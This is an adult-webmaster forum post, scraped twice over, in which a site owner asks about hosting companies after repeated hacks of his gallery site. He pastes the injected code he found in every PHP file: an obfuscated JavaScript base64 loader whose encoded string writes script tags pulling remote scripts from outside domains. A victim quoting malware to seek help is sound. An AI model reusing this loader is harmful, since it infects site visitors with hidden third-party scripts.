GoFuckYourself.com - Adult Webmaster Forum - View Single Post - Hosting Companies

Pseudonymous · 04-20-2012, 08:22 PM

Well I have other domains on the server but they aren't infected.

AutoGallerySQL is what they dont make anymore. Yeah I could purchase their newer script, export and import into that. but like i said, these are handmade galleries and it would truly take forever. it'd be basically makign the site over again and hoping it does as well. i dont want to start a website from scratch again and put in a crazy amount of man hours. I have my plate full before this, i just dont have the time. I bought the site because i dont have the time to be rebuilding each and every freaking thing from ground up

Well im not looking for a guarantee, i'm looking to explain the exact thing theyre doing and if its something they are real sure they can stop, ill move over, if they can't, ill point my domain back to my old server company and cancel. I truly think this is something that can be stopped and ill reward a server company for putting an end to it.

I guess malware? I mean it triggers googles safe browsing warning. I can't give you all details because no matter what i do, i can't see the issue myself. It seems mainly americans can see the ads. Its typically at the bottom of my site, and a banner. Im not sure what it is this time. Even when i use a proxy, i still can't see it though

At the bottom of my page

<script language="JavaScript" type="text/javascript">function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));en c2=base64.indexOf(input.charAt(i++));enc3=base64.i ndexOf(input.charAt(i++));enc4=base64.indexOf(inpu t.charAt(i++));ch1=(enc1<<2)|(enc2>>4);ch2=((enc2& 15)<<4)|(enc3>>2);ch3=((enc3&3)<<6)|enc4;output=ou tput+String.fromCharCode(ch1);if(enc3!=64)output=o utput+String.fromCharCode(ch2);if(enc4!=64)output= output+String.fromCharCode(ch3);ch1=ch2=ch3="";enc 1=enc2=enc3=enc4=""}while(i<input.length);return output;}document.write(decode64("PHNjcmlwdCBzcmM9I mh0dHA6Ly9wYWxhLm5ldC8ucGhwIj48L3NjcmlwdD4KPHNjcml wdCBzcmM9Imh0dHA6Ly95YWNsaXAuY29tL2luLnBocCI+PC9zY 3JpcHQ+CjxzY3JpcHQgc3JjPSJodHRwOi8vcGV5by5vcmcvLnp pcCI+PC9zY3JpcHQ+"));</script>

I get this garbage inserted into the html. Its at the bottom of every php file right now so it seems

The person seems to do something different everytime.

And my other domains are my paysites, this is my one tgp on this server. So maybe they do have access to all but only choosing to screw with the tgp because their tool works with tradescripts or who knows

04-20-2012, 08:22 PM
Pseudonymous Photographer/Owner Industry Role: Join Date: Apr 2006 Location: Vancouver, Canada Posts: 2,661	Well I have other domains on the server but they aren't infected. AutoGallerySQL is what they dont make anymore. Yeah I could purchase their newer script, export and import into that. but like i said, these are handmade galleries and it would truly take forever. it'd be basically makign the site over again and hoping it does as well. i dont want to start a website from scratch again and put in a crazy amount of man hours. I have my plate full before this, i just dont have the time. I bought the site because i dont have the time to be rebuilding each and every freaking thing from ground up Well im not looking for a guarantee, i'm looking to explain the exact thing theyre doing and if its something they are real sure they can stop, ill move over, if they can't, ill point my domain back to my old server company and cancel. I truly think this is something that can be stopped and ill reward a server company for putting an end to it. I guess malware? I mean it triggers googles safe browsing warning. I can't give you all details because no matter what i do, i can't see the issue myself. It seems mainly americans can see the ads. Its typically at the bottom of my site, and a banner. Im not sure what it is this time. Even when i use a proxy, i still can't see it though At the bottom of my page <script language="JavaScript" type="text/javascript">function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));en c2=base64.indexOf(input.charAt(i++));enc3=base64.i ndexOf(input.charAt(i++));enc4=base64.indexOf(inpu t.charAt(i++));ch1=(enc1<<2)\|(enc2>>4);ch2=((enc2& 15)<<4)\|(enc3>>2);ch3=((enc3&3)<<6)\|enc4;output=ou tput+String.fromCharCode(ch1);if(enc3!=64)output=o utput+String.fromCharCode(ch2);if(enc4!=64)output= output+String.fromCharCode(ch3);ch1=ch2=ch3="";enc 1=enc2=enc3=enc4=""}while(i<input.length);return output;}document.write(decode64("PHNjcmlwdCBzcmM9I mh0dHA6Ly9wYWxhLm5ldC8ucGhwIj48L3NjcmlwdD4KPHNjcml wdCBzcmM9Imh0dHA6Ly95YWNsaXAuY29tL2luLnBocCI+PC9zY 3JpcHQ+CjxzY3JpcHQgc3JjPSJodHRwOi8vcGV5by5vcmcvLnp pcCI+PC9zY3JpcHQ+"));</script> I get this garbage inserted into the html. Its at the bottom of every php file right now so it seems The person seems to do something different everytime. And my other domains are my paysites, this is my one tgp on this server. So maybe they do have access to all but only choosing to screw with the tgp because their tool works with tradescripts or who knows __________________ Previous owner of SoloRevenue Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com Last edited by Pseudonymous; 04-20-2012 at 08:27 PM..